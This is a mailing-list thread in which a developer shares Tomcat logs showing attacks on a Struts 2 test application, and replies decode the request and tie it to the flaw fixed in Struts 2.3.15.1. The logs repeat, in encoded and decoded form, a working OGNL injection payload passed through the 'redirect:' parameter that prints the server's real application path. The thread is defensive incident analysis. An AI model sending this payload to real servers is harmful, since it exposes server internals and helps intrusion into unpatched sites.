This is the vulnerability that was addressed in Struts 2.3.15.1.
On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL <jlm...@gmail.com>wrote:
> What version of Struts are you using? It seems
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> HTTP/1.0" 200 74
>
> transforms to
>
> 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
>
> /common/test2.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()}
> HTTP/1.0" 200 74
>
> That basically returns on the response the real path of your application.
>
>
>
>
>
> 2014-01-30 Amol Ghotankar <ghotankaru...@gmail.com>
>
> > I have seen some sample app for testing which was developed using
> struts2.
> >
> > I saw some unknow files getting uploaded on test,
> >
> > I initially thought that my tomcat was hacked or my server was hacked but
> > now after a close analysis it looks a struts2 webwork secuirty issue or
> > vulenrability or may me my miss configurations or something not sure
> >
> > Can any one in struts2 team fix this gloabally and help me to get rid of
> > this locally without version upgrades.....
> >
> > Here are the tomcat logs which clearly says the story
> >
> > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
> >
> >
> /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> > HTTP/1.0" 200 74
> >
> > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET
> >
> >
> /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> > HTTP/1.0" 200 74
> >
> > 60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET
> >
> >
> /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
> > HTTP/1.0" 200 74
> >
> >
> > I hope my issue is clear and valid.
> >
> > Original issue on stackoverflow at
> >
> >
> http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole
> >
> >
> >
> >
> > --
> >
> >
> >
> > *With Best Regards,*
> >
> > Amol Ghotankar
> > Technical Lead
> > M: +91 9960 980 419 <http://www.cursivetech.com>
> >
>
